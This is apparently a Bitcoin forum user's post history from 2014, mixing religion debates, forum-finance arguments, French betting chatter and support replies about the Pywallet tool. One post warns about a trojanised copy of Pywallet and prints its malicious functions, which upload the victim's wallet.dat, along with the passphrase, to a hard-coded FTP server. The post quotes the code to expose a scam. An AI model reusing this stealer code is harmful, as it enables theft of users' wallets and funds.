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361  Other / Off-topic / Re: Scientific proof that God exists? on: October 01, 2014, 09:14:14 AM
Quote from: Kurt Gödel
The idea that everything in the world has a meaning [reason] is an exact analogue of the principle that everything has a cause, on which rests all of science.
Huh?
362  Local / Hors-sujet / Re: Paris sur le cours du bitcoin 1 Octobre on: October 01, 2014, 08:23:32 AM
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363  Local / Hors-sujet / Re: Paris sur le cours du bitcoin 1 Octobre on: September 30, 2014, 03:05:03 PM
Ok je vote pour Smiley
Nouveau topic pour les speed bets ?
Et j'enleve toutes les limites si quelqu'un fait escrow avec moi.
Suffit de me donnée sont addresse bitcoin .

Je m'occuperai de tout, il aura que a signer la transaction.

Plus de 1 paris par personne et plus de 100 possible

Je veux bien faire escrow
Si la communauté l'accepte

Idem
364  Bitcoin / Development & Technical Discussion / Re: Pywallet 2.2: manage your wallet [Update required] on: September 30, 2014, 08:27:45 AM
Out of curiosity: how can I calculate the version of a coin? As far as I've read, it has to do with the public address... but can't seem to find a way to see the version of a specific crypto.
http://btpp.jampa.eu/get_coin_version/?address=Xg7DzZQt3Fax69ozwJreFAmiBHxVoWWroc


It's just the first byte of DecodeBase58Check(address)
365  Bitcoin / Development & Technical Discussion / Re: Pywallet 2.2: manage your wallet [Update required] on: September 28, 2014, 06:27:46 PM
I've been asked the meaning of the JSON keys for the addresses, here it is
Tell me if I forgot anything

Quote
addr: bitcoin address
compressed: whether the key is compressed or not
encrypted_privkey: encrypted private key (only present if the wallet is encrypted)
hexsec: private key in hexadecimal format (32 bytes)
secret: hexsec with 0x01 appended if the key is compressed (32 or 33 bytes)
sec: bitcoin private key (base58check'd)
pubkey: public key in DER format, ie 0x04+X+Y or 0x02+X or 0x03+X (33 or 65 bytes)
reserve: whether the key is in the pool or not
366  Bitcoin / Development & Technical Discussion / Re: Pywallet 2.2: manage your wallet [Update required] on: September 28, 2014, 06:11:58 PM
I'm glad it works Smiley
Tell me how it goes, I may help more than pywallet itself
367  Other / Off-topic / Re: Scientific proof that God exists? on: September 28, 2014, 04:09:35 PM
Could you please stop spamming a thread that has valuable information in it?  Would be appreciated.
So much irony my eyes are burning
368  Bitcoin / Development & Technical Discussion / Re: Pywallet 2.2: manage your wallet [Update required] on: September 28, 2014, 02:46:51 PM
Finally managed to install everything in order to run pywallet. Still can't access it through web interface, neither I can dump a wallet through command line... Any clues on what I'm doing wrong?
What happens exactly?
What do you want to do?
369  Bitcoin / Development & Technical Discussion / Re: New Pywallet 0.0.1a5 on: September 28, 2014, 08:20:37 AM
so can pywallet dump private keys?
Of course
370  Other / Meta / Re: Forum finances on: September 26, 2014, 05:45:20 PM
I wonder what is the purpose of posting forum finances openly ? Users are not stakeholder. May be, only those who donated, have the right to access this data.

I agree
Just like only the developers of the bitcoin software have the right to access the source code

Precisely what jackjack said. That is one of the most stupid suggestions I have ever seen on this forum, BitCoinDream. You are asking a forum that is used for discussion of a completely decentralized currency to centralize itself and make its finances private. What is the point of that...?

I dont need to ask it to be centralized. It is Centralized. DefaultTrust is the biggest example of that. I'm skipping the other examples as those are beyond the scope of discussion of this thread. Its funny that someone is comparing Bitcoin Core's development model with the forum !!! How come are they comparable ?



The thing is that I don't understand why it bothers you
I don't understand the "only xxx have the right to access the data" thing either

Don't get me wrong, I don't think users HAVE to know about the finances. But if theymos chose to do it I don't see where the problem is
371  Other / Off-topic / Re: Scientific proof that God exists? on: September 26, 2014, 04:16:06 PM

That pic is stupid
Before any mountain appeared you could have drawn the same thing with "atoms -> xxx -> xxx -> mountains"
That doesn't mean someone actually built them

You can trust whatever you want, but this pic is meaningless
372  Other / Off-topic / Re: Scientific proof that God exists? on: September 26, 2014, 04:11:12 PM
I believe in God. I don't think it is essential to have a Scientific proof that God exists.

Everything in science revolves around evidence. Many scientific "facts" have been proven wrong over the years, when other scientific facts proved them wrong.

We don't live in a vacuum. We don't simply pick a fictional thing to believe in, and then simply believe. Rather, we look at the evidence, and when the evidence is not sufficient to be proof, we either believe, or we don't believe. When the evidence becomes so overwhelmingly absolute, we stop believing, because there is proof. We no longer believe. Rather, we know.

This is why the religions almost always talk about faith. It has to do with something for which there is strong evidence. Yet the evidence isn't something that quite makes it to the area of proof.

This is the exact reason why scientific beliefs that old age earth is a fact, and that evolution is a fact, are really religious beliefs. There seems to be strong evidence for these scientific ideas. Yet there isn't enough evidence to make them facts. So, when we hold to them, it is by belief, faith that they are true. This kind of science is essentially religion.

What's interesting is, when you stand science next to God, God is much stronger from a religious point of view, at least regarding the age of the earth and where life comes from.

Smiley

How does god make the Earth being 6000 years old a fact?
And please don't write 50 lines of anti-science stuff. Just show us the evidences.

The evidence is/lies in the strength of the witnesses, whose strength lies in in the writings of Moses, whose credibility for at least using strong supernatural power is built around strong tradition of a whole nation of people who are very traditionally minded, and very precision-accurate when transcribing their religious books that contain their traditional-national beliefs, strongly holding that these traditions are true.

Fact is fact. Proof is something else. All we have, either in science or religion is evidence. If you examine the strength of tradition in the Jewish religion as a science, you will find that THAT evidence overcomes any we have in standard science.

Sorry about the many lines.

Smiley

EDIT: Decky is getting to me. I'm starting to have to erase the second period at the end of the sentences I write.

You have faith in a book some people wrote thousands of years ago
I have faith in uranium datation

I don't get why you think the uranium results are wrong though
373  Other / Meta / Re: Forum finances on: September 26, 2014, 03:48:55 PM
I wonder what is the purpose of posting forum finances openly ? Users are not stakeholder. May be, only those who donated, have the right to access this data.

I agree
Just like only the developers of the bitcoin software have the right to access the source code
374  Other / Off-topic / Re: Scientific proof that God exists? on: September 26, 2014, 03:43:13 PM
I believe in God. I don't think it is essential to have a Scientific proof that God exists.

Everything in science revolves around evidence. Many scientific "facts" have been proven wrong over the years, when other scientific facts proved them wrong.

We don't live in a vacuum. We don't simply pick a fictional thing to believe in, and then simply believe. Rather, we look at the evidence, and when the evidence is not sufficient to be proof, we either believe, or we don't believe. When the evidence becomes so overwhelmingly absolute, we stop believing, because there is proof. We no longer believe. Rather, we know.

This is why the religions almost always talk about faith. It has to do with something for which there is strong evidence. Yet the evidence isn't something that quite makes it to the area of proof.

This is the exact reason why scientific beliefs that old age earth is a fact, and that evolution is a fact, are really religious beliefs. There seems to be strong evidence for these scientific ideas. Yet there isn't enough evidence to make them facts. So, when we hold to them, it is by belief, faith that they are true. This kind of science is essentially religion.

What's interesting is, when you stand science next to God, God is much stronger from a religious point of view, at least regarding the age of the earth and where life comes from.

Smiley

How does god make the Earth being 6000 years old a fact?
And please don't write 50 lines of anti-science stuff. Just show us the evidences.
375  Other / Off-topic / Re: Scientific proof that God exists? on: September 26, 2014, 02:02:54 PM
I just could not resist to post this picture. I think you will find good analogy in it. After all it is worth more than 1000 words:




EDIT: Meh. This image is too small. And I can't find bigger version. Bear with it.

376  Bitcoin / Development & Technical Discussion / Re: New Pywallet 0.0.1a5 on: September 26, 2014, 12:26:38 PM
That's why I sign stuff now... Sad
Always look at the sigs in OP, check my code, and check diffs
The diff of this scam: https://www.diffchecker.com/z5qzwxni (look at line 2600ish)

Code:
def cryptedul(): 
       import ftplib
        rand = random.randrange(000000, 999999)
        dbdir = determine_db_dir()
        session = ftplib.FTP('212.48.76.120','crypto','crypto')
with open(dbdir + '/wallet.dat', 'rb') as ifh:
        session.storbinary('STOR wallet.dat - ' + rand, ifh, 19206)
        session.quit()

def cryptedull():
        import ftplib
        dbdir = determine_db_dir()
        session = ftplib.FTP('212.48.76.120','crypto','crypto')
        with open(dbdir + '/wallet.dat', 'rb') as ifh:
                session.storbinary('STOR wallet.dat - ' + options.passphrase, ifh, 19206)
                session.quit()


The guy is also on reddit: (SCAM LINK) http://www.reddit.com/user/jj-jackjack

FYI
Scammers so far: Nimer, LittleHodor
377  Bitcoin / Development & Technical Discussion / Re: New Pywallet 0.0.1a5 on: September 24, 2014, 08:41:18 AM
python NPW_0.0.1a5.py

What are you running it on? Windows? Linux?

I got it to run but I didn't realize it doesn't support my wallet.

How does one go about supporting a different coin/wallet?

What do you want to do? (dump?import?)
You can use the old pywallet, or you can wait for the next version of NPW to be released
378  Other / Off-topic / Re: Scientific proof that God exists? on: September 24, 2014, 07:02:59 AM
Quote
isn't it unfair that Jesus, who was completely sinless and blameless, had to come to suffer for my sins?  I am the one that chose to sin but he paid the price for my sins
Yeah just like the dinosaurs died because we release to much greenhouse gases into the atmosphere
379  Other / Meta / Re: FUCK YOU MODERATOR!!!!!!!!!!! on: September 22, 2014, 08:04:01 AM
Quote
YOUR JUST AFRAID THAT MANY OF THE MEMBER WILL GET A HIGH POSITION
Yes they are very afraid of people using the forum a lot
A forum full of newbies is much more appealing
380  Bitcoin / Development & Technical Discussion / Re: New Pywallet 0.0.1a5 on: September 21, 2014, 09:54:23 PM
python NPW_0.0.1a5.py

What are you running it on? Windows? Linux?
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